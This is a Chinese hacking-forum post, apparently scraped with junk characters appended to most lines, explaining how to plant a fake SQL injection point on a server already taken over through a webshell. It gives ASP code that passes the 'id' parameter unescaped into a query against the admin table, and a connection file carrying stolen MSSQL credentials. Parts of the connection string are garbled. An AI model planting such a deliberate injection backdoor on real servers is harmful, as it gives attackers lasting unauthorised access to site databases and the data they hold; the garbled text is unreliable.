自己构造注入点方便入侵& h8 q8 q/ S$ r& A
% B/ p" E# A7 m2 \1 B今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息
7 m1 x0 ^5 l+ j* }
" r/ q4 A c N- ?. y这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!) k1 {# _5 r6 r' @
2 F2 n: D' w" l% y. Z5 g首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和
! t! s" W( B' p' g# F
" Z' |. a% w' | o! m( ~+ z/ ^密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表
0 s6 z/ s+ y; m/ y2 ]( Z Q
0 G1 G7 K- s! I5 y) n6 C0 x4 C因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:
) r% v! n' ]4 W5 Z' @1 C u8 s
4 F3 N! c% U5 |) J( S5 c6 p程序代码5 C0 q2 P1 n9 h& [# A [: g5 D+ L. F. R
<!--#include file="xx.asp"-->- w+ s2 Y) e: {$ n+ [
<%
5 \) y; t' u& X/ x$ q5 {: T% Iset rs=server.createobject("ADODB.recordset")# c* N% h# A, ?* ^6 i2 k, M
id = request("id")
5 b' c9 b. f2 M- b/ `strSQL = "select * from admin where id=" & id
- K) P% g4 O1 r$ j+ n/ X- Vrs.open strSQL,conn,1,3
) j; D1 N# K) F) \rs.close6 M+ O( z$ n. R$ Y
%>! Y: F8 W: C) ~% l, F) }
- G `/ b& H! R W( M# @把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在+ T! [! L7 Z6 L/ C
+ p1 s0 B0 l* C7 Q* }
你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!+ x& N5 ?& U% Q& d' K C2 g
3 S) k3 A W' W7 m4 s' u
然后就要构造一个连接数据库的文件了,代码如下:0 k- K' ^1 a- |" j1 i/ d, K1 Y
程序代码
1 R, w' P0 i6 o' V% d$ P- S<%
K/ v/ Q9 Z1 _5 z, @strSQLServerName = "000.000.000.000" '服务器名称或地址0 [! C, }8 Z% i2 d5 T/ T8 q! a
strSQLDBUserName = "sqlname" '数据库帐号/ d6 \/ Y; { o2 [6 A
strSQLDBPassword = "sqlpass" '数据库密码
( D$ @" G% T& M, w+ ~( L' {strSQLDBName = "sqldataname" '数据库名称
7 R/ B. G9 I9 o! y9 _' F0 KSet conn = Server.CreateObject("ADODB.Connection")0 {/ G. \# j* F0 r O0 I& x k
strCon = " rovider=SQLOLEDB.1 ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & " assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"% g1 b9 D$ L+ v& G) I3 d- L7 @* M
conn.open strCon) P8 b. c7 y# f1 ^1 z8 Y
%>
* ] U/ W5 q+ J" B) `+ g
+ M) O" v0 n5 f6 C( }% L& {, L! m1 A这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,
2 e5 S a+ b- ^2 t2 _
. N8 G7 k; j# P) u就这样,正常情况下,就OK了,伪造成功……" j2 h- ~8 Z- ^; ^7 i
0 z8 }0 |* K/ F* |! R6 T& Y: T
如果有什么问题可以提出来大家一起探讨解决。 |